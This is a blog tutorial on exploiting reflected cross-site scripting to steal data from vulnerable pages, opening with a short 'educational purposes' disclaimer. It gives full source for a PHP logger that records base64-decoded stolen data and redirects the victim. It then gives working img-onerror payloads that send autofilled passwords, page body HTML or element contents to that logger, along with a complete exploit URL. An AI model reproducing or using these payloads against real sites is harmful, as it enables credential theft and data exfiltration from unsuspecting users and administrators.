This article is only for educational purposes and i will not be responsible for any damage done by using this technique. This is only to teach and demonstrate the risk and impact of these security flaws.
Cross Site Scripting
Cross-Site Scripting is a vulnerability that allows an attacker to executeJavascript commands on the web application which can be used to perform further attacks like virtual defacement, keylogging, or to perform other dangerous tasks. Read more about Cross Site Scripting.
About this article
In this article i will be teaching a new technique for exploiting Cross Site Scripting vulnerability in order to steal sensitive information and credentials from an XSS vulnerable page. As the javascript commands are executable on the site, we are able to perform a large number of attacks. But in this article we will be focusing on the methodology of stealing, capturing and logging the data using XSS vulnerability. In this article you will learn the followings:
- Stealing specific content from a page.
- Stealing inputted values from a page.
- Stealing source code of a vulnerable page.
- Accessing values of different areas.
- Logging the captured data back to file.
Requirements:
We need to set up the following things in order to proceed:
- Apache server / Website(for hosting .php)
- .PHP data logger
- Basic knowledge of XSS
Location for hosting your files
You need to set up a place where you will be hosting your .php stealer. I am using XAMPP for running these files on my computer. You can also try hosting sites like 000webhost or any other.
PHP data logger
We will need a .php file which will be logging a data sent to it in a text file so we can view it afterwards. The following is the source code of the PHP file i am going to use, you need to upload this on a site or store it on localhost:
Sourcecode:
<?php error_reporting(0); $filename = 'log.txt'; if(isset($_GET['c'])){ $content = '[Host]: ' . $_SERVER['HTTP_HOST'] .PHP_EOL; $content .= '[Remote Addr]: ' . $_SERVER['Remote_addr'] .PHP_EOL; $content .= '[Sensitive Information]: ' . base64_decode($_GET['c']) .PHP_EOL; $content .= PHP_EOL.PHP_EOL; file_put_contents($filename, $content, FILE_APPEND | LOCK_EX); }else{ $data = file_get_contents($filename); $convert = explode("\n",$data); for ($i=0;$i<count($convert);$i++){ echo $convert[$i].'</br>'; } } echo '<script>document.location="https://google.com/";</script>'; ?>
save it as index.php on your localhost or site.
Also create an empty log.txt file in the same directory. I will be saving these both files in localhost ( 127.0.0.1/index.php , 127.0.0.1/log.txt)
Exploitation
Testing the XSS
Now we are need to find a site vulnerable to XsS. For testing XSS vulneability frm beginning see thisarticle.
After finding the site we need to inject a basic payload in any input area in order to test it, if the payload reflects back without any filtering then it will be vulnerable to XSS.
Suppose there is a sitehttp://www.site.com/?msg=invalid username if we enter <XSS> in themsg parameter and check its response and if the response is not filtered or sanitized and it reflects back as it is then it will be vulnerable to Cross Site Scripting attack. But we need to execute javascript command first, injecting basic prob tag is to test if its accepting tags or not after the tags are not filtered we can inject “><img src=x onerror=prompt(1)> in order to execute the javascript popup. On the right side, you can see an image which shows a popup which means the payload we injected was successfully executed on the site.
Popup = Vulnerable to XSS
Stealing sensitive information & credentials with XSS
The followings are the methods to do the following tasks:
- Stealing Credentials/Sensitive information
- Source Code Stealing
- Stealing a specific content
Stealing Credentials / Sensitive information
Most of the times are there are some sensitive information stored in the web page. Most of the users and administrators these days use the Auto-Complete functions in login panels or admin panels or any other areas such as any input area which carries the value of Credit Card Number etc. First of all i’d suggest to avoid using these kind of functionalities which will automatically input your credentials. So in this method we are going to steal credentials from an admin panel. The followings are the rules for this:
- Data must be inputted automatically(Auto-complete functionality).
- The payload should be executed after the data is entered.
Before creating the payload we need to check how many input fields are there, after that suppose we need to get value entered in the Password field , which is the 3rd field. We will use the following code:
document.getElementsByTagName(‘input’)[2].value
we can access the 3rd input tag using getElementsByTagName(‘input’)[2] if it was the second field then we will use [1] instead of 2. The .value is used for selecting the value entered in that specified field. Suppose the password field is having a value entered by the user then this will get the value entered by the User.
In the following image you can see the fields numbered from 0 to 2 as there are 3 fields:
Now lets try to get the value entered in the second field, just for a simple test we will use alert() to show the value in a popup so we can make sure that we have accessed the value entered in that field. Make sure to always use IMG tag instead of SCRIPT tag because img takes a while to load and it can capture the data easily while the script tag will execute command before the input of data in the input field. We will use the following payload for that:
<img src=x onerror=”alert(document.getElementsByTagName(‘input’)[2].value)”>
The above mentioned payload will show the password entered in the 3rd field in a Popup:
As you can see in the above image, we have successfully accessed the password of the panel. Now the next step is that we have to steal the password and need to log it into a text file. Here we will need the PHP stealer that we created before the exploitation. We will have to create a payload that will send the Password to our PHP stealer so that the PHP file can log it into a text file. We need to use redirection to do that, we can use location to send the password to the stealer. The following is the syntax:
location=(‘URL to PHP file’)
This is used for redirections, now we need to include document.getElementsByTagName(‘input’)[2].value so it will be send to the PHP file. So this will be our final payload:
<img src=x onerror=”location=(‘http://127.0.0.1/?c=’ %2b btoa(document.getElementsByTagName(‘input’)[2].value))”>
Here is our final payload, this will redirect to the PHP stealer and will combine the url and the data like this127.0.0.1/?c=PASSWORD . Also you may have noticed that i used %2b instead of + , thats because when we are going to enter this in URL the + will be converted to space but we want to enter a plus sign so i used URL encoded + so the %2b will be converted to + when its entered in the URL. I also usedbtoa() to BASE64 encode the password so if there are characters like # or & , it won’t create any problem and i have also included base64_decode()function in the PHP file that will further decode it before logging.
Final Exploit: http://site.com/?msg=<img src=x onerror=”location=(‘http://127.0.0.1/?c=’ %2b btoa(document.getElementsByTagName(‘input’)[2].value))”>
This will steal the password and will log it into a log.txt file:
This is how are can steal sensitive information and credentials from login pages and input areas using XSS. There are other methods also for stealing different information.
Stealing source code:
We can get the source code of the <body></body> tag by using the following payload:<img src=x onerror=”location=(‘http://127.0.0.1/?c=’ %2b document.body.innerHTML)”>
This will capture the source code of Body tag. Most of the information and secret URLs are mostly placed in this tag and we can get that using this trick. This may lead to a great info disclosure. The procedure for logging the data using this trick is same as previous one just the payload is different.
Stealing source code by specified Id:
Suppose there is an element with Id “shawar” , we are able to get it using the following payload:<img src=x onerror=”location=(‘http://127.0.0.1/?c=’ %2b document.getElementById(‘shawar’).innerHTML)”>
Suppose there is a tag <div id=”shawar”>secret information</div> , then using the above payload will capture the secret information. These techniques can be used to capture lots of sensitive information and can be handy some times.
إرسال تعليق